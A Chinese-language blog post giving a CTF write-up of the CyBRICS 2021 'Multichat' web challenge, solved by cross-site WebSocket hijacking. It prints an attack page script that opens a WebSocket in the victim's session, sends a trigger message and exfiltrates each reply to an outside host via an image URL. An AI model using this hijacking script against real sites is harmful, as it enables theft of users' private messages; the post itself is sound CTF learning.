

<!DOCTYPE html>
<html lang="en" color-mode=light>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>CyBRICS2021Multichat - Welcome to fallingblog</title>
  <meta name="apple-mobile-web-app-capable" content="yes" />
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="google" content="notranslate" />
  
  <meta name="description" content="赛博金砖比赛的web题，比赛时没做出来，赛后看了Snd...">
  <meta name="author" content="Ibukifalling">
  <link rel="icon" href="/images/icons/favicon-16x16.png" type="image/png" sizes="16x16">
  <link rel="icon" href="/images/icons/favicon-32x32.png" type="image/png" sizes="32x32">
  <link rel="apple-touch-icon" href="/images/icons/apple-touch-icon.png" sizes="180x180">
  <meta rel="mask-icon" href="/images/icons/stun-logo.svg" color="#333333">
  
    <meta rel="msapplication-TileImage" content="/images/icons/favicon-144x144.png">
    <meta rel="msapplication-TileColor" content="#000000">
  

  
<link rel="stylesheet" href="/css/style.css">


  
    
<link rel="stylesheet" href="//at.alicdn.com/t/font_1445822_r673sha78lq.css">

  

  
    
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.css">

  

  
    
      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/xcode.min.css" name="highlight-style" mode="light">

      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/solarized-dark.min.css" name="highlight-style" mode="dark">

      
  

  <script>
    var CONFIG = window.CONFIG || {};
    var ZHAOO = window.ZHAOO || {};
    CONFIG = {
      isHome: false,
      fancybox: true,
      pjax: false,
      lazyload: {
        enable: true,
        only_post: 'false',
        loading: '[object Object]'
      },
      donate: {
        enable: true,
        alipay: 'https://pic.izhaoo.com/alipay.jpg',
        wechat: 'https://pic.izhaoo.com/wechat.jpg'
      },
      galleries: {
        enable: true
      },
      fab: {
        enable: true,
        always_show: false
      },
      carrier: {
        enable: true
      },
      daovoice: {
        enable: false
      },
      preview: {
        background: {
          default: '',
          api: ''
        },
        motto: {
          default: '我在开了灯的床头下，想问问自己的心啊。',
          typing: true,
          api: 'https://v2.jinrishici.com/one.json',
          data_contents: '["data","content"]'
        },
      },
      qrcode: {
        enable: true,
        type: 'url',
        image: 'https://pic.izhaoo.com/weapp-code.jpg',
      },
      toc: {
        enable: true
      },
      scrollbar: {
        type: 'default'
      },
      notification: {
        enable: false,
        delay: 4500,
        list: '',
        page_white_list: '',
        page_black_list: ''
      },
      search: {
        enable: false,
        path: ''
      }
    }
  </script>

  

  

<meta name="generator" content="Hexo 5.4.0"></head>

<body class="lock-screen">
  <div class="loading"></div>
  
    


  <nav class="navbar">
    <div class="left">
      
        <i class="iconfont iconhome j-navbar-back-home"></i>
      
      
        <i class="iconfont iconqrcode j-navbar-qrcode"></i>
      
      
        <i class="iconfont iconmoono" id="color-toggle" color-toggle="light"></i>
      
      
    </div>
    <div class="center">CyBRICS2021Multichat</div>
    <div class="right">
      <i class="iconfont iconmenu j-navbar-menu"></i>
    </div>
    
      <div id="qrcode-navbar"></div>
    
  </nav>

  
  

<nav class="menu">
  <div class="menu-container">
    <div class="menu-close">
      <i class="iconfont iconbaseline-close-px"></i>
    </div>
    <ul class="menu-content"><li class="menu-item">
        <a href="/ " class="underline "> 首页</a>
      </li><li class="menu-item">
        <a href="/galleries/ " class="underline "> 摄影</a>
      </li><li class="menu-item">
        <a href="/archives/ " class="underline "> 归档</a>
      </li><li class="menu-item">
        <a href="/tags/ " class="underline "> 标签</a>
      </li><li class="menu-item">
        <a href="/categories/ " class="underline "> 分类</a>
      </li><li class="menu-item">
        <a href="/about/ " class="underline "> 关于</a>
      </li></ul>
    
      <div class="menu-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
    
  </div>
</nav>
  <main id="main">
  <div class="article-wrap">
    <div class="row container">
      <div class="col-xl-3"></div>
      <div class="col-xl-6"><article class="article">
  <div class="wrap">
    <section class="head">
  <img   class="lazyload" data-original="/images/theme/post-image.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  draggable="false">
  <div class="head-mask">
    <h1 class="head-title">CyBRICS2021Multichat</h1>
    <div class="head-info">
      <span class="post-info-item"><i class="iconfont iconcalendar"></i>July 27, 2021</span>
      
      <span class="post-info-item"><i class="iconfont iconfont-size"></i>6611</span>
    </div>
  </div>
</section>
    <section class="main">
      <section class="content">
        <p>赛博金砖比赛的web题，比赛时没做出来，赛后看了Sndav大佬的exp后（在naman提示我“你应该先通本地“之后de出了自己写的脚本里至少三个bug）成功复现</p>
<p>总体来说感悟很多，写一篇文章记录一下</p>
<h1 id="CyBRICS2021-Multichat"><a href="#CyBRICS2021-Multichat" class="headerlink" title="[CyBRICS2021]Multichat"></a>[CyBRICS2021]Multichat</h1><h2 id="总览"><a href="#总览" class="headerlink" title="总览"></a>总览</h2><p><img   class="lazyload" data-original="/images/CyBRICS2021Multichat/image-20210727171205422.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>概要：下面的网址是一个多人聊天室，技术人员和管理员是一个秘密房间的成员，当技术人员给管理员发送”Hey, i forgot the flag. Can you remind me?”时，管理员就会告诉他flag。</p>
<p><img   class="lazyload" data-original="/images/CyBRICS2021Multichat/image-20210727172555485.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>聊天室界面如图，左上角输入房间号后点击connect就能加入聊天室。</p>
<h2 id="寻找思路"><a href="#寻找思路" class="headerlink" title="寻找思路"></a>寻找思路</h2><p>在郭哥的提示下意识到这个聊天室是由websocket实现的</p>
<blockquote>
<p>WebSocket简介</p>
<p>​    WebSocket是一种网络通信协议，它的最大特点就是，服务器可以主动向客户端推送信息，客户端也可以主动向服务器发送信息，是真正的双向平等对话，属于<a target="_blank" rel="noopener" href="https://en.wikipedia.org/wiki/Push_technology">服务器推送技术</a>的一种。</p>
</blockquote>
<p>然后又在谷歌上找到了关于<strong>跨站WebSocket劫持</strong>的资料</p>
<blockquote>
<h2 id="What-is-cross-site-WebSocket-hijacking"><a href="#What-is-cross-site-WebSocket-hijacking" class="headerlink" title="What is cross-site WebSocket hijacking?"></a>What is cross-site WebSocket hijacking?</h2><p>Cross-site WebSocket hijacking (also known as cross-origin WebSocket hijacking) involves a <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/csrf">cross-site request forgery</a> (CSRF) vulnerability on a <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/websockets/what-are-websockets#how-are-websocket-connections-established">WebSocket handshake</a>. It arises when the WebSocket handshake request relies solely on HTTP cookies for session handling and does not contain any <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/csrf/tokens">CSRF tokens</a> or other unpredictable values.</p>
<p>An attacker can create a malicious web page on their own domain which establishes a cross-site WebSocket connection to the vulnerable application. The application will handle the connection in the context of the victim user’s session with the application.</p>
<p>The attacker’s page can then send arbitrary messages to the server via the connection and read the contents of messages that are received back from the server. This means that, unlike regular CSRF, the attacker gains two-way interaction with the compromised application.</p>
</blockquote>
<p>然后注意到聊天室右上角那个电话图标是可以点的</p>
<p><img    class="lazyload" data-original="/images/CyBRICS2021Multichat/image-20210727175009234.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">THIS</span></p>
<p>点击之后跳转到一个向技术人员寻求帮助的界面</p>
<p><img   class="lazyload" data-original="/images/CyBRICS2021Multichat/image-20210727175047961.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>看到可以填入URL，猜想有可能是这个url会被技术人员访问</p>
<p>意识到这题很可能就是跨站WebSocket劫持，然后把这个想法发到了飞书话题里面。</p>
<p>嗯，发完之后就没我什么事了，因为我在这个地方被一个很蠢的东西卡住了……</p>
<p><img   class="lazyload" data-original="/images/CyBRICS2021Multichat/image-20210727184410335.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>比赛的时候一直显示Invalid captcha验证失败，这题就没继续往下做了</p>
<p>赛后复现的时候研究了半天，发现需要 挂 代 理，居然是要     挂    代    理！！！</p>
<p>（我不知道这个验证到底是怎么整的，但是不挂代理就一直过不了，感觉在这种地方被卡住了就挺无语的）</p>
<h2 id="实施攻击"><a href="#实施攻击" class="headerlink" title="实施攻击"></a>实施攻击</h2><p>解决了令人<img   class="lazyload" data-original="/images/CyBRICS2021Multichat/23C5B6A2.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  style="zoom:50%;" />的验证问题，下面我们来聊一下Cross-site WebSocket hajacking的原理和实施</p>
<p>先看以下这个WebSocket网页脚本的简单例子</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">var</span> ws = <span class="hljs-keyword">new</span> WebSocket(<span class="hljs-string">&quot;wss://xxxxxxxxxxxxxx&quot;</span>);<span class="hljs-comment">//创建一个WebSocket连接</span><br><br>ws.onopen = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">evt</span>) </span>&#123; <span class="hljs-comment">//建立连接成功后的回调函数</span><br>  <span class="hljs-built_in">console</span>.log(<span class="hljs-string">&quot;Connection open ...&quot;</span>); <br>  ws.send(<span class="hljs-string">&quot;Hello WebSockets!&quot;</span>);<br>&#125;;<br><br>ws.onmessage = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">evt</span>) </span>&#123;<span class="hljs-comment">//收到服务器数据后的回调函数</span><br>  <span class="hljs-built_in">console</span>.log( <span class="hljs-string">&quot;Received Message: &quot;</span> + evt.data);<br>  ws.close();<br>&#125;;<br><br>ws.onclose = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">evt</span>) </span>&#123;<span class="hljs-comment">//连接关闭后的回调函数</span><br>  <span class="hljs-built_in">console</span>.log(<span class="hljs-string">&quot;Connection closed.&quot;</span>);<br>&#125;;<br></code></pre></td></tr></table></figure>

<p>很容易就能看明白，连接建立后通过onmessage等几个函数来进行控制。</p>
<p>那么我们再看本题所使用的脚本</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">script</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;text/javascript&quot;</span>&gt;</span><span class="javascript"></span><br><span class="javascript">    <span class="hljs-keyword">var</span> conn;</span><br><span class="javascript">    <span class="hljs-keyword">var</span> sended_message = <span class="hljs-string">&quot;&quot;</span>;</span><br><span class="javascript"></span><br><span class="javascript">    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getRandomInt</span>(<span class="hljs-params">min, max</span>) </span>&#123;</span><br><span class="javascript">        min = <span class="hljs-built_in">Math</span>.ceil(min);</span><br><span class="javascript">        max = <span class="hljs-built_in">Math</span>.floor(max);</span><br><span class="javascript">        <span class="hljs-keyword">return</span> <span class="hljs-built_in">Math</span>.floor(<span class="hljs-built_in">Math</span>.random() * (max - min) + min); <span class="hljs-comment">//The maximum is exclusive and the minimum is inclusive</span></span><br><span class="javascript">    &#125;</span><br><span class="javascript">    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">appendLog</span>(<span class="hljs-params">item</span>) </span>&#123;</span><br><span class="javascript">        <span class="hljs-keyword">var</span> escaped = $(<span class="hljs-string">&quot;&lt;div&gt;&quot;</span>).text(item).html();</span><br><span class="javascript">        <span class="hljs-keyword">if</span> (item === sended_message) &#123;</span><br><span class="javascript">            log.innerHTML += <span class="hljs-string">&#x27;&lt;div class=&quot;chat-message-right pb-4&quot;&gt;&lt;div class=&quot;flex-shrink-1 bg-light rounded py-2 px-3 mr-3&quot;&gt;&lt;div class=&quot;font-weight-bold mb-1&quot;&gt;You&lt;/div&gt;&#x27;</span> +</span><br><span class="javascript">                escaped + <span class="hljs-string">&#x27;&lt;/div&gt;&lt;/div&gt;&#x27;</span>;</span><br><span class="javascript">            sended_message = <span class="hljs-string">&quot;&quot;</span>;</span><br><span class="javascript">        &#125; <span class="hljs-keyword">else</span> &#123;</span><br><span class="javascript">            log.innerHTML += <span class="hljs-string">&#x27;&lt;div class=&quot;chat-message-left pb-4&quot;&gt;&lt;div class=&quot;flex-shrink-1 bg-light rounded py-2 px-3 mr-3&quot;&gt;&#x27;</span> +</span><br><span class="javascript">                escaped + <span class="hljs-string">&#x27;&lt;/div&gt;&lt;/div&gt;&#x27;</span>;</span><br><span class="javascript">        &#125;</span><br><span class="javascript">        log.scrollTop = log.scrollHeight;</span><br><span class="javascript">    &#125;</span><br><span class="javascript">    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">connect</span>(<span class="hljs-params"></span>) </span>&#123;</span><br><span class="javascript">        <span class="hljs-keyword">let</span> room = <span class="hljs-built_in">document</span>.getElementById(<span class="hljs-string">&quot;room&quot;</span>).value;</span><br><span class="javascript">        <span class="hljs-built_in">document</span>.cookie = <span class="hljs-string">&#x27;room=&#x27;</span> + <span class="hljs-built_in">encodeURIComponent</span>(room);</span><br><span class="javascript">        $(<span class="hljs-string">&quot;form input&quot;</span>).prop( <span class="hljs-string">&quot;disabled&quot;</span>, <span class="hljs-literal">false</span> );</span><br><span class="javascript">        $(<span class="hljs-string">&quot;#room&quot;</span>).hide();</span><br><span class="javascript">        $(<span class="hljs-string">&quot;#room&quot;</span>).parent().children().first().text(<span class="hljs-string">&quot;Room &quot;</span> + room);</span><br><span class="javascript"></span><br><span class="javascript">        $(<span class="hljs-string">&quot;#connectButton&quot;</span>).hide();</span><br><span class="javascript"></span><br><span class="javascript">        <span class="hljs-keyword">if</span> (<span class="hljs-built_in">window</span>[<span class="hljs-string">&quot;WebSocket&quot;</span>]) &#123;</span><br><span class="javascript">            conn = <span class="hljs-keyword">new</span> WebSocket(<span class="hljs-string">&quot;ws://multichat-cybrics2021.ctf.su/ws&quot;</span>);</span><br><span class="javascript">            conn.onclose = <span class="hljs-function"><span class="hljs-keyword">function</span> (<span class="hljs-params">evt</span>) </span>&#123;</span><br><span class="javascript">                <span class="hljs-keyword">var</span> item = <span class="hljs-string">&quot;&quot;</span>;</span><br><span class="javascript">                <span class="hljs-keyword">if</span> (evt.code === <span class="hljs-number">1003</span>) &#123;</span><br><span class="javascript">                    item = <span class="hljs-string">`Status: <span class="hljs-subst">$&#123;evt.reason&#125;</span>`</span>;</span><br><span class="javascript">                &#125; <span class="hljs-keyword">else</span> &#123;</span><br><span class="javascript">                    item = <span class="hljs-string">&quot;Connection closed.&quot;</span>;</span><br><span class="javascript">                &#125;</span><br><span class="javascript">                appendLog(item);</span><br><span class="javascript">            &#125;;</span><br><span class="javascript">            conn.onopen = <span class="hljs-function"><span class="hljs-keyword">function</span> (<span class="hljs-params">evt</span>) </span>&#123;</span><br><span class="javascript">                appendLog(<span class="hljs-string">&quot;Connected&quot;</span>);</span><br><span class="javascript">            &#125;;</span><br><span class="javascript">            conn.onmessage = <span class="hljs-function"><span class="hljs-keyword">function</span> (<span class="hljs-params">evt</span>) </span>&#123;</span><br><span class="javascript">                appendLog(evt.data);</span><br><span class="javascript">            &#125;;</span><br><span class="javascript">        &#125; <span class="hljs-keyword">else</span> &#123;</span><br><span class="javascript">            appendLog(<span class="hljs-string">&quot;Your browser does not support WebSockets.&quot;</span>);</span><br><span class="javascript">        &#125;</span><br><span class="javascript">    &#125;</span><br><span class="javascript">    <span class="hljs-built_in">window</span>.onload = <span class="hljs-function"><span class="hljs-keyword">function</span> (<span class="hljs-params"></span>) </span>&#123;</span><br><span class="javascript">        <span class="hljs-keyword">var</span> room = getRandomInt(<span class="hljs-number">1000</span>, <span class="hljs-number">9999999999</span>);</span><br><span class="javascript">        <span class="hljs-keyword">var</span> msg = <span class="hljs-built_in">document</span>.getElementById(<span class="hljs-string">&quot;msg&quot;</span>);</span><br><span class="javascript">        <span class="hljs-keyword">var</span> log = <span class="hljs-built_in">document</span>.getElementById(<span class="hljs-string">&quot;log&quot;</span>);</span><br><span class="javascript"></span><br><span class="javascript">        <span class="hljs-built_in">document</span>.getElementById(<span class="hljs-string">&quot;form&quot;</span>).onsubmit = <span class="hljs-function"><span class="hljs-keyword">function</span> (<span class="hljs-params"></span>) </span>&#123;</span><br><span class="javascript">            <span class="hljs-keyword">if</span> (!conn) &#123;</span><br><span class="javascript">                <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;</span><br><span class="javascript">            &#125;</span><br><span class="javascript">            <span class="hljs-keyword">if</span> (!msg.value) &#123;</span><br><span class="javascript">                <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;</span><br><span class="javascript">            &#125;</span><br><span class="javascript">            conn.send(msg.value);</span><br><span class="javascript">            sended_message = msg.value;</span><br><span class="javascript">            msg.value = <span class="hljs-string">&quot;&quot;</span>;</span><br><span class="javascript">            <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;</span><br><span class="javascript">        &#125;;</span><br><span class="javascript"></span><br><span class="javascript">        <span class="hljs-built_in">document</span>.getElementById(<span class="hljs-string">&quot;room&quot;</span>).value = room;</span><br><span class="javascript">    &#125;;</span><br></code></pre></td></tr></table></figure>

<p>忽略一些不重要的地方，这段代码的主要逻辑就是：建立ws连接，然后使用appendLog函数将接受到的信息输出到页面上</p>
<p>我们就可以通过修改这一段代码，放在我们的劫持页面上，来进行跨站WebSocket劫持</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">script</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;text/javascript&quot;</span>&gt;</span><span class="javascript"></span><br><span class="javascript">    <span class="hljs-keyword">var</span> conn;</span><br><span class="javascript">    </span><br><span class="javascript">    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">appendLog</span>(<span class="hljs-params">item</span>)</span>&#123;</span><br><span class="javascript">            <span class="hljs-built_in">document</span>.write(<span class="hljs-string">`&lt;img src=http://120.53.107.60/cookiegeter.php?cookie=<span class="hljs-subst">$&#123;<span class="hljs-built_in">escape</span>(item)&#125;</span>&lt;/img&gt;`</span>)<span class="hljs-comment">//简单的xss</span></span><br><span class="javascript">    &#125;</span><br><span class="javascript">    </span><br><span class="javascript">    conn = <span class="hljs-keyword">new</span> WebSocket(<span class="hljs-string">&quot;ws://multichat-cybrics2021.ctf.su/ws&quot;</span>);</span><br><span class="javascript">    conn.onclose=<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">evt</span>)</span>&#123;</span><br><span class="javascript">        appendLog(<span class="hljs-string">&quot;Connection closed&quot;</span>)</span><br><span class="javascript">    &#125;</span><br><span class="javascript">    conn.onopen=<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">evt</span>)</span>&#123;</span><br><span class="javascript">        appendLog(<span class="hljs-string">&quot;Success!&quot;</span>);</span><br><span class="javascript">        conn.send(<span class="hljs-string">&quot;Hey, i forgot the flag. Can you remind me?&quot;</span>)</span><br><span class="javascript">    &#125;</span><br><span class="javascript">    conn.onmessage=<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">evt</span>)</span>&#123;</span><br><span class="javascript">        appendLog(evt.data)</span><br><span class="javascript">    &#125;;</span><br><span class="javascript"></span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>这里通过改写appendLog函数和onopen函数，当WebSocket连接建立时会自动向服务器发送暗号”Hey, i forgot the flag. Can you remind me?”，并且接受到信息时会写入指定的地址中</p>
<p><img   class="lazyload" data-original="/images/CyBRICS2021Multichat/image-20210727203347026.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>然后把我们整好的劫持网址输进URL栏里，点击Send（记得挂梯子）</p>
<p><img   class="lazyload" data-original="/images/CyBRICS2021Multichat/image-20210727204421875.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>cybrics{Pwn3d_CR055_51t3_W3850CK3t_h1jACK1n9}</p>
<h1 id="感想和总结"><a href="#感想和总结" class="headerlink" title="感想和总结"></a>感想和总结</h1><p>参加国际比赛的时候梯子真的真的很重要！(不管是通过google进行信息搜集还是一些因为网络问题导致的搞人心态的问题)</p>
<p>一开始做这题，naman曾试图爆破，我向他提出这题不太可能是爆破找到秘密房间。后来虽然找到了关于跨站WebSocket劫持的资料，但是由于本人技术水平所限（和令人<img   class="lazyload" data-original="/images/CyBRICS2021Multichat/23C5B6A2.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  style="zoom:50%;" />的验证失败问题）最终没有做出这一题，赛后复现所用的脚本很大程度上参考了Sndav哥哥的exp</p>
<p>水平尚待提高，仍需努力</p>

      </section>
      <section class="extra">
        
        
          <section class="donate">
  <div id="qrcode-donate">
    <img   class="lazyload" data-original="https://pic.izhaoo.com/alipay.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" >
  </div>
  <div class="icon">
    <a href="javascript:;" id="alipay"><i class="iconfont iconalipay"></i></a>
    <a href="javascript:;" id="wechat"><i class="iconfont iconwechat-fill"></i></a>
  </div>
</section>
        
        
  <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Cross-site-WebSocket-hijacking/" rel="tag">Cross-site WebSocket hijacking</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web/" rel="tag">web</a></li></ul> 

        
  <nav class="nav">
    <a></a>
    <a href="/2021/07/26/dailywp1/">日常刷题记录20210726<i class="iconfont iconright"></i></a>
  </nav>

      </section>
      
    </section>
  </div>
</article></div>
      <div class="col-xl-3">
        
          
  <aside class="toc-wrap">
    <h3 class="toc-title">文章目录：</h3>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#CyBRICS2021-Multichat"><span class="toc-text">[CyBRICS2021]Multichat</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E8%A7%88"><span class="toc-text">总览</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AF%BB%E6%89%BE%E6%80%9D%E8%B7%AF"><span class="toc-text">寻找思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#What-is-cross-site-WebSocket-hijacking"><span class="toc-text">What is cross-site WebSocket hijacking?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E6%96%BD%E6%94%BB%E5%87%BB"><span class="toc-text">实施攻击</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%84%9F%E6%83%B3%E5%92%8C%E6%80%BB%E7%BB%93"><span class="toc-text">感想和总结</span></a></li></ol>
  </aside>

        
      </div>
    </div>
  </div>
</main>
  

<footer class="footer">
  <div class="footer-social"><a 
        href="tencent://message/?Menu=yes&uin=894519210 "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#12B7F5'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconQQ "></i>
      </a><a 
        href="javascript:; "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#09BB07'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconwechat-fill "></i>
      </a><a 
        href="https://www.instagram.com/izhaoo/ "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#DA2E76'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconinstagram "></i>
      </a><a 
        href="https://github.com/zhaoo "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#9f7be1'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  icongithub-fill "></i>
      </a><a 
        href="mailto:izhaoo@163.com "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color=#FF3B00" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconmail"></i>
      </a></div>
  
    <div class="footer-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
  
</footer>
  
      <div class="fab fab-plus">
    <i class="iconfont iconplus"></i>
  </div>
  
  
  <div class="fab fab-up">
    <i class="iconfont iconcaret-up"></i>
  </div>
  
  
  
    
<script src="/js/color-mode.js"></script>

  
  
</body>

<script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.min.js"></script>



  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js"></script>




  
<script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.js"></script>






  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.qrcode/1.0/jquery.qrcode.min.js"></script>




<script src="/js/utils.js"></script>
<script src="/js/script.js"></script>







  <script>
    (function () {
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
      } else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
      }
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>













</html>